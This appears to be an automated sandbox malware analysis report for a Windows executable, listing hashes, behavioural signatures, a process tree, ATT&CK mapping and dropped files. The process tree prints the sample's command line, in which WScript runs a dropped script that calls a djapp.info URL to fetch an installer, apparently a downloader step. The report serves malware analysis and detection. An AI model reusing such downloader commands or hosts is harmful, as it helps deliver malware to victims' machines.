0af367a6c2d315a0c5f268e413c473f795a7c812636c9f32e3d51a755a72f4b4

Analysis

max time kernel
122s
max time network
128s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
27/04/2024, 01:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe
Size

184KB
MD5

02269b000b66f0a2b3e37f916c16db61
SHA1

4cea131d8373fd3ba795141d4c8f30cbc88a05e1
SHA256

0af367a6c2d315a0c5f268e413c473f795a7c812636c9f32e3d51a755a72f4b4
SHA512

c0d5e438617ad06a3b7a563f58d8e19fd71baf8fe443d55af9cb51fd012f5b82aa80c9b8625f737ffce558530e96304dfb5b2317ff32337757c573af505d848d
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO39:/7BSH8zUB+nGESaaRvoB7FJNndnY

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	2724	WScript.exe
8	2724	WScript.exe
10	2724	WScript.exe
12	2456	WScript.exe
13	2456	WScript.exe
15	1076	WScript.exe
16	1076	WScript.exe
18	2012	WScript.exe
19	2012	WScript.exe
21	1672	WScript.exe
22	1672	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1304	2216	WerFault.exe	27

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 2216 wrote to memory of 2724	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	28
PID 2216 wrote to memory of 2724	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	28
PID 2216 wrote to memory of 2724	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	28
PID 2216 wrote to memory of 2724	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	28
PID 2216 wrote to memory of 2456	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	30
PID 2216 wrote to memory of 2456	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	30
PID 2216 wrote to memory of 2456	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	30
PID 2216 wrote to memory of 2456	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	30
PID 2216 wrote to memory of 1076	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	32
PID 2216 wrote to memory of 1076	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	32
PID 2216 wrote to memory of 1076	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	32
PID 2216 wrote to memory of 1076	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	32
PID 2216 wrote to memory of 2012	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	34
PID 2216 wrote to memory of 2012	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	34
PID 2216 wrote to memory of 2012	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	34
PID 2216 wrote to memory of 2012	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	34
PID 2216 wrote to memory of 1672	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	36
PID 2216 wrote to memory of 1672	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	36
PID 2216 wrote to memory of 1672	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	36
PID 2216 wrote to memory of 1672	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	36
PID 2216 wrote to memory of 1304	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	40
PID 2216 wrote to memory of 1304	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	40
PID 2216 wrote to memory of 1304	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	40
PID 2216 wrote to memory of 1304	2216	02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe	40

C:\Users\Admin\AppData\Local\Temp\02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\02269b000b66f0a2b3e37f916c16db61_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2216
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe
  2⤵
  - Blocklisted process makes network request
  PID:2724
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe
  2⤵
  - Blocklisted process makes network request
  PID:2456
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe
  2⤵
  - Blocklisted process makes network request
  PID:1076
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe
  2⤵
  - Blocklisted process makes network request
  PID:2012
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6A09.js" http://www.djapp.info/?domain=lcEIgrFHWM.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf6A09.exe
  2⤵
  - Blocklisted process makes network request
  PID:1672
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2216 -s 472
  2⤵
  - Program crash
  PID:1304

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
1faa26ae52cac819bc42e2ee6f6ef61f

SHA1
4a06963e3a50439e0a23dd8977e7856a1c3ae579

SHA256
bdf3acc2946bbc6cd65df5af28acb5f5155d13fe2d2f889a479c2039413c2c3b

SHA512
fb7551568671c946a3882b9435955624b01fc14fccf80c3d2554582d478aa613d9ec07b86e7f2b4f250933d5eb805bdf3c57239bc26ff854e3f243381e33a04c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
3f8e0e519bdf8824165285c45007dd56

SHA1
5bb94cf84ed7eade78ec68b4dd2d65d5fa43360d

SHA256
1f6d78d69b28eae5765137a5e93b3eecdc5536bcd1b56d4f6494ed520ebc952a

SHA512
b7ec2bc5407d867355aa9eab536df24882156f0f1b122959c1669f49a86c842c5d8b072f035d6d378a37cf11c644cd6b8ea7b99a38cadce6055ed078823031c4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
76bc9c4a089ab90a1d4c06de527c3bc7

SHA1
2cdcfb29303752d22db2c195c621909cfa45dc21

SHA256
6c9ac89fb5a07743fd22616db83148bd38cd8c6abc6ae4689effeba44c8f1b30

SHA512
2ca5784c2adf741f40ce663ea12090cf9d5472e638990768743cf42b54538bd52b03df6f079e6201679e2bb4b0ae15091caa87e6ddcacdd31f80ecaece3c5e48

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
571e2ffb85e355e8364079a177c85aff

SHA1
6205503272b3fa1908210094d5f6097bed739dd3

SHA256
d103e66cc71b81479443e3e746a50b3f86776e2706ab08249255cfe08b2b078e

SHA512
64c5658fa3eafe0ee5caf4fd491683c5be9d1eb1f78f2016ad8dece631417794a43df7c195873a103377dfb5b9ccb7ba0850a785b200fa6d61bd6798486f6bfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
79e919bed4f1b2f0cba8d1b4b3692c6e

SHA1
fa2566714e24352780299bbe5f7875285b40ab89

SHA256
d18a5fd6ba03d4cfb07ff17db1483efe282a83faafbdd6a30c4114de74d48793

SHA512
17224e8a5274a2021ff2de525f9a2503d3d752f78b9b51cdaa11c54f2527cb60d625c5cf92183de998083bf4f5b80786fe5b8842ae8d6c2ca7376e0b818701b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5DKX8QD5\domain_profile[1].htm

Filesize
6KB

MD5
80f251b96823c7b68922642c7f3d6207

SHA1
4df6762b5aad25a72ae851a364cec92434c3b560

SHA256
3f8702565255190f814e3ccbd812c205131a1ef280b74779ae4f4b40232a459e

SHA512
79fd3d54d27e179ebc1a9b5fb8e45c7124e458e2977430fd326c110921226bc1ed9bf3cf600d8fa5b1e30b84a388a98838e14a3b59f1a77447325e755904170e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
fe76f9c23cb8154464ff015b63671488

SHA1
c78528298af122b424993911f992a59c4e48584d

SHA256
8cd4480c928fb9fce744e044536e3dba16d3542ed8ebec44e7964df2595c1d0e

SHA512
da3370f208f92ff177e590daef1f8c9cec0b351ab3f31556120db8d16c605c00fe9b1c4ec13297f7722887a301c0908ef7d6d0b5e8423d88be7d0af162a7449a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
0f5eeaa1c2280eb9f00e840cc0342a10

SHA1
78a4a1ef8cee8cc2a85a98ebb785f25383f98f82

SHA256
dd84fc9d54446f6efa26e034cac2cd65b7a0e58e6df66780c1a1a9a3da640ab0

SHA512
e57ef0f83104263f46dbb623f2ca1e1aea36cbac0d3272f7b7322973bc4271531257328a93e570698893bb4f475cafdc841854cccaf68e9bd6780feada6d1529

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L9PN2QMY\domain_profile[1].htm

Filesize
6KB

MD5
dbfd4a6a4054c8403232455e4dcd250e

SHA1
6cfc38140dbd6a76636f6639fd7e657787537bc2

SHA256
5ed6ab46850d2182a369319c8e571e0349ddd851e3d3d4fdb1586f66ac173200

SHA512
64b4784c01bd1bc974a810ba3239a3906791c4ec3997bf31d8a72709d99c5ff15e3f53339eef3bfa5341753ee20eaca73475d3ac646bd0b65006b8b5f6a22472

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9972.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarB211.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf6A09.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\LU757EEN.txt

Filesize
177B

MD5
69e29209f990511922b4eb4d9545f0b4

SHA1
9a41c52daf811e8868def2728eb2ac7f86c6d589

SHA256
3901421aea7d5a8beb6a8d2e1efd4e628b39624f0441834428d421079c34cbdd

SHA512
feea3f118f72625661a3621e4da5be611a24f9f1bfe34377016296d1b7fe77722802701c27e182d1199ed157882e324bad57375bbc759aba7a3489c8e7a6c78f

Download Submit